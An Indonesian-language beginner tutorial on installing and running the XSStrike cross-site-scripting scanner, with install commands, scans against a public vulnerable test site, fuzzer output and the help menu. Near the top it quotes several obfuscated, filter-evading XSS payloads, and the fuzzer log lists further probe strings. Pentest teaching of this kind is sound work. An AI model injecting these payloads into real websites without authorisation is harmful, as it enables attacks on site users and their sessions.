XSSTRIKE TOOL

Cara Install Dan Gunakan Tool Xsstrike Untuk Pemula

Pendahuluan

Pada artikel ini saya akan membuat tutorial cara install dan gunakan tool xsstrike untuk pemula di mana tool ini bisa mendeteksi kerentanan web atau web aplikasi hal ini cocok untuk kebutuhan pentesting. Pada di akun github nya kamu bisa lihat di sini menjelaskan XSStrike adalah rangkaian deteksi Cross Site Scripting yang dilengkapi dengan empat parser tulisan tangan, generator muatan cerdas, mesin fuzzing yang kuat, dan perayap yang sangat cepat. Alih-alih menyuntikkan muatan dan memeriksanya berfungsi seperti semua alat lain, XSStrike menganalisis respons dengan banyak parser dan kemudian membuat muatan yang dijamin bekerja dengan analisis konteks yang terintegrasi dengan mesin fuzzing. Berikut adalah beberapa contoh payload yang dihasilkan oleh XSStrike:

}]};(confirm)()//\
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//

Selain itu, XSStrike juga memiliki kemampuan crawling, fuzzing, parameter discovery, deteksi WAF. Itu juga memindai kerentanan DOM XSS.

Beberapa Fitur

  • Tercermin dan pemindaian DOM XSS
  • Perayapan multi-utas
  • Analisis konteks
  • Inti yang dapat dikonfigurasi
  • Deteksi Dan penghindaran WAF
  • Pemindaian JS lib yang kedaluwarsa
  • Generator muatan cerdas
  • Pengurai HTML Dan JavaScript buatan tangan
  • Mesin fuzzing yang kuat
  • Dukungan buta XSS
  • Alur kerja yang sangat diteliti
  • Dukungan HTTP lengkap
  • Muatan bruteforce dari file
  • Didukung oleh Foton, Zetanize dan Arjun
  • Pengkodean Muatan

Install

Termux

Untuk cara install pada termux kamu harus mengikuti langkah di bawah ini :

1. pkg update && pkg upgrade
2. pkg install python3
3. pkg install git
4. git clone https://github.com/s0md3v/XSStrike.git

Windows & Linux

Untuk windows dan linux bisa ikuti di bawah ini :

1. git clone https://github.com/s0md3v/XSStrike.git

Pada sistem operasi windows pastikan kamu sudah install python nya.

Cara Menggunakan Tool Xsstrike

Untuk cara menggunakannya untuk hal ini di sini saya menggunakan windows. Saya akan mendeteksi apakah target rentan terhadap xsstrike pastikan kamu change directory saat ini, kamu bisa lihat di bawah ini perintahnya :

C:\Users\galihap\XSStrike>xsstrike.py -u http://testphp.vulnweb.com/?members.php?id=1

Hasil :

XSStrike v3.1.5

[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: members.php
[-] No reflection found

Pada selanjutnya saya akan lebih melanjutkan scanner xss pada web aplikasi perintahnya :

C:\Users\galihap\XSStrike>xsstrike.py -u http://testphp.vulnweb.com/?members.php?id=1 --fuzzer

Hasil :

XSStrike v3.1.5

[+] WAF Status: Offline
[!] Fuzzing parameter: members.php
[!] [filtered] <test
[!] [filtered] <test//
[!] [filtered] <test>
[!] [filtered] <test x>
[!] [filtered] <test x=y
[!] [filtered] <test x=y//
[!] [filtered] <test/oNxX=yYy//
[!] [filtered] <test oNxX=yYy>
[!] [filtered] <test onload=x
[!] [filtered] <test/o%00nload=x
[!] [filtered] <test sRc=xxx
[!] [filtered] <test data=asa
[!] [filtered] <test data=javascript:asa
[!] [filtered] <svg x=y>
[!] [filtered] <details x=y//
[!] [filtered] <a href=x//
[!] [filtered] <emBed x=y>
[!] [filtered] <object x=y//
[!] [filtered] <bGsOund sRc=x>
[!] [filtered] <iSinDEx x=y//
[!] [filtered] <aUdio x=y>
[!] [filtered] <script x=y>
[!] [filtered] <script//src=//
[!] [filtered] ">payload<br/attr="
[!] [filtered] "-confirm``-"
[!] [filtered] <test ONdBlcLicK=x>
[!] [filtered] <test/oNcoNTeXtMenU=x>
[!] [filtered] <test OndRAgOvEr=x>

Kamu bisa melihat daftar pengaturan xsstrike :

C:\Users\galihap\XSStrike>xsstrike.py -h

Hasil pengaturan xsstrike :

XSStrike v3.1.5

usage: xsstrike.py [-h] [-u TARGET] [--data PARAMDATA] [-e ENCODE] [--fuzzer] [--update] [--timeout TIMEOUT] [--proxy] [--crawl] [--json] [--path]
                   [--seeds ARGS_SEEDS] [-f ARGS_FILE] [-l LEVEL] [--headers [ADD_HEADERS]] [-t THREADCOUNT] [-d DELAY] [--skip] [--skip-dom] [--blind]
                   [--console-log-level {DEBUG,INFO,RUN,GOOD,WARNING,ERROR,CRITICAL,VULN}] [--file-log-level {DEBUG,INFO,RUN,GOOD,WARNING,ERROR,CRITICAL,VULN}]
                   [--log-file LOG_FILE]

optional arguments:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET
                        url
  --data PARAMDATA      post data
  -e ENCODE, --encode ENCODE
                        encode payloads
  --fuzzer              fuzzer
  --update              update
  --timeout TIMEOUT     timeout
  --proxy               use prox(y|ies)
  --crawl               crawl
  --json                treat post data as json
  --path                inject payloads in the path
  --seeds ARGS_SEEDS    load crawling seeds from a file
  -f ARGS_FILE, --file ARGS_FILE
                        load payloads from a file
  -l LEVEL, --level LEVEL
                        level of crawling
  --headers [ADD_HEADERS]
                        add headers
  -t THREADCOUNT, --threads THREADCOUNT
                        number of threads
  -d DELAY, --delay DELAY
                        delay between requests
  --skip                don't ask to continue
  --skip-dom            skip dom checking
  --blind               inject blind XSS payload while crawling
  --console-log-level {DEBUG,INFO,RUN,GOOD,WARNING,ERROR,CRITICAL,VULN}
                        Console logging level
  --file-log-level {DEBUG,INFO,RUN,GOOD,WARNING,ERROR,CRITICAL,VULN}
                        File logging level
  --log-file LOG_FILE   Name of the file to log

Nah kamu bisa lebih lanjut menggunakan tool tersebut. Semoga bermanfaat :D

Disclaimer

Tutorial ini hanya untuk pendidikan dan pembelajaran menggunakan tool tersebut tolong jangan di salah gunakan!